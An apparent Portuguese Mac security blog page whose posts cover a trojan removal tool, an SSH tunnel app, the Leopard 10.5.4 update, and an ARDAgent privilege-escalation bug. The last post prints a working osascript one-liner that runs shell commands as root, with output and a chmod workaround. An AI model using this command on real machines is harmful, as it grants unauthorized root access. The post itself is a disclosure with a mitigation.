30 janeiro, 2009 Postado por: Eduardo Medeiros
SecureMac lançou iServices Trojan Removal Tool 1.1, trata-se de um utilitário para auxiliar na remoção do OSX.Trojan.iServices.
Clique aqui para saber mais.
Categoria OSX, Segurança | Sem comentários »
9 dezembro, 2008 Postado por: Eduardo Medeiros
O iSSH oferece uma maneira simples de iniciar uma conexão SSH Tunel, para aqueles que não sabem como utilizar o terminal ou simplesmente não precisa dele.
Categoria OSX, Segurança | Sem comentários »
1 julho, 2008 Postado por: Eduardo Medeiros
Apple liberou ontem o update 10.5.4 para Leopard.
Segue o changelog:
What’s included?
The 10.5.4 Update is recommended for all users running Mac OS X Leopard and includes general operating system fixes that enhance the stability, compatibility and security of your Mac.
General
AirPort
iCal
Safari
Spaces and Exposé
Pois é.. corrigir o bug do Apple Remote Desktop (ARDAgent) nada?
Sinceramente… estou começando a ficar preocupado com a Apple.
Será que a qualidade vai cair ?
Abraços.
Categoria OSX, Segurança | Sem comentários »
19 junho, 2008 Postado por: Eduardo Medeiros
Encontrado BUG de escalação de privilégio no ARDAgent (Apple Remote Desktopt).
Com AppleScript é possivel executar comandos como usuário root.
Veja o exemplo abaixo:
# id uid=501(eduardomedeiros) gid=20(staff) groups=20(staff),102(com.apple.access_ssh),98(_lpadmin),81(_appserveradm),103(com.apple.sharepoint.group.2),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)
Obs: note que estou logado como usuário eduardomedeiros
# osascript -e 'tell app "ARDAgent" to do shell script "id"'; uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),103(com.apple.sharepoint.group.2),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff)
Obs: Repare que a saída do comando id, exibe usuário root.
Solução provisória:
chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Obs: Ao Reparar as permissões pelo Disk Utility, a permissão do ARD voltará ao estado original.
Fonte: Slashdot.
Abraços.
Categoria OSX, Segurança | Sem comentários »
Site feito por: Eduardo Medeiros, utilizando tecnologia Wordpress.
Melhor visualizado no Firefox/Safari/I.E 8.0
DOTMAC - 2005-2009 - Todos os direitos reservados.